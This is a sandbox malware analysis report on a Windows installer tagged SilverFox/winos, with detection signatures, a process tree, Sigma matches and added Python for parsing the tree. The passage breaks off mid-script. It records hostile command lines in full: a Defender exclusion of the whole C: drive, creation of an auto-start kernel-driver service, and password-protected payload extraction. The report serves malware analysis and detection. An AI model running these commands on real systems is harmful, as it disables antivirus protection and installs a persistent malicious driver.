
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.1.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b1.0.1.exe (the #Uxxxx escapes are the sandbox's encoding of the non-ASCII file name; #U5b89#U88c5#U52a9#U624b decodes to 安装助手, "Installation Assistant", so the file was distributed as 安装助手1.0.1.exe)
Note: renamed because the original name is a hash value
Original sample name: 1.0.1.exe
Analysis ID: 1580229
MD5: f2845d6410a0d9a090d414f3ae742e3b
SHA1: a27e62687254f001c08b5313465d2ed1870f0eb5
SHA256: f56c3d038c408355f6fb191865ca5650b29926f65b78d02b008b509bf640e588
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 1560 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F2845D6410A0D9A090D414F3AE742E3B)
    • #U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 5972 cmdline: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)
      • powershell.exe (PID: 5908 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7056 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F2845D6410A0D9A090D414F3AE742E3B)
        • #U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 2352 cmdline: "C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)
          • 7zr.exe (PID: 4296 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 1292 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2924 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2172 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5628 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6196 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1488 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2924 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1272 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2724 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1272 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5628 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3224 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6480 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5268 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3116 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1988 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches
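The process tree above is the one artifact a responder will lift from this report, and it has a trap in it: the sandbox run reuses PIDs (5972 is both the Inno Setup .tmp stage and a later conhost.exe; 2172 is both the sc.exe that creates the driver service and a later cmd.exe), so correlating records by PID alone mislinks parents and children. The following Python is an added example, not Joe Sandbox tooling: it parses the tree's text format back into records, keeps the parent link by tree position rather than by PID, and reports the reused PIDs, the records whose parent PID is ambiguous, and how many times `sc start CleverSoar` was issued. TREE is a constructed excerpt copied from the lines above (not the complete tree, which repeats the cmd.exe/sc.exe start attempt dozens of times), and two spaces per nesting level is assumed from the rendering.

```python
import re
from collections import defaultdict

# Added example, not Joe Sandbox tooling. TREE is a constructed excerpt of the
# tree lines in the report; two-spaces-per-level indentation is assumed.
NODE = re.compile(r"^(\s*)• (.+?) \(PID: (\d+) cmdline: (.*) MD5: ([0-9A-Fa-f]{32})\)$")

TREE = r"""
  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 1560 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F2845D6410A0D9A090D414F3AE742E3B)
    • #U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 5972 cmdline: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)
      • powershell.exe (PID: 5908 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • #U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F2845D6410A0D9A090D414F3AE742E3B)
        • #U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 2352 cmdline: "C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)
          • 7zr.exe (PID: 4296 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2924 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2172 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 2680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5628 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 2172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6196 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
"""


def parse_tree(text: str) -> list[dict]:
    """Flatten the indented bullet list; nesting depth comes from indentation.
    ParentIndex is the unambiguous link (position in the list); ParentProcessId
    is what a PID-keyed log join would have to rely on."""
    procs, stack = [], []          # stack holds (depth, index into procs)
    for line in text.splitlines():
        m = NODE.match(line)
        if not m:
            continue               # "System is w10x64", "cleanup", blank lines
        depth = len(m.group(1))
        while stack and stack[-1][0] >= depth:
            stack.pop()
        parent = stack[-1][1] if stack else None
        procs.append({
            "Image": m.group(2), "ProcessId": int(m.group(3)),
            "CommandLine": m.group(4), "MD5": m.group(5).upper(),
            "ParentIndex": parent,
            "ParentProcessId": procs[parent]["ProcessId"] if parent is not None else None,
        })
        stack.append((depth, len(procs) - 1))
    return procs


def children(procs: list[dict], index: int) -> list[dict]:
    """Children by tree position, which survives PID reuse."""
    return [p for p in procs if p["ParentIndex"] == index]


def pid_reuse(procs: list[dict]) -> dict[int, list[str]]:
    """PIDs seen under more than one image during the run. Windows recycles
    PIDs quickly, so a PID is only unique together with the process start
    time (or a ProcessGuid in Sysmon terms)."""
    seen = defaultdict(list)
    for p in procs:
        if p["Image"] not in seen[p["ProcessId"]]:
            seen[p["ProcessId"]].append(p["Image"])
    return {pid: images for pid, images in seen.items() if len(images) > 1}


def ambiguous_parents(procs: list[dict]) -> list[int]:
    """ProcessIds whose ParentProcessId matches more than one record, i.e.
    where a join on PID alone cannot tell which process spawned them."""
    by_pid = defaultdict(int)
    for p in procs:
        by_pid[p["ProcessId"]] += 1
    return [p["ProcessId"] for p in procs
            if p["ParentProcessId"] is not None and by_pid[p["ParentProcessId"]] > 1]


def count_command(procs: list[dict], pattern: str) -> int:
    """Number of records whose whole command line matches `pattern`."""
    return sum(1 for p in procs if re.fullmatch(pattern, p["CommandLine"], re.I))


if __name__ == "__main__":
    procs = parse_tree(TREE)
    print("reused PIDs:", pid_reuse(procs))
    print("records with an ambiguous parent PID:", ambiguous_parents(procs))
    print("sc start attempts:", count_command(procs, r"sc start CleverSoar"))
```

When lifting this tree into a timeline, key each process on (PID, start time) or the tree position, never on PID alone; on the excerpt above, PID-only joining cannot decide whether sc.exe 6196 was spawned by the sc.exe or the cmd.exe that both carried PID 2172.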

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 5972, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5908, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2924, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2172, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 5972, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5908, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2924, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2172, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 5972, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5908, ProcessName: powershell.exe
No Suricata rule has matched
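The Sigma hits above reduce to a handful of string checks on process-creation events: `Add-MpPreference` with an exclusion switch in a PowerShell command line, the same cmdlet hidden inside a base64 payload (what the `base64offset` modifier in the match data is for), and `sc create ... type= kernel` registering a driver whose binPath is not even a `.sys`. The following Python is an added example, not Joe Sandbox output and not the Sigma rules themselves: it reimplements those checks, including the base64offset expansion for both ASCII and UTF-16LE, and runs them over events constructed from this report's process tree. The field names, the `-EncodedCommand` variant under PID 5909 and the benign `sc query` control event are assumptions.

```python
import base64
import re

# Added example, not Joe Sandbox or Sigma code. Events are constructed from
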